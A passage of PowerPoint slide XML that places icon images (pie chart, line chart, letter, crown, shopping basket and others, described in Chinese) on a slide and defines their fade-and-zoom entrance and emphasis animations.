        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
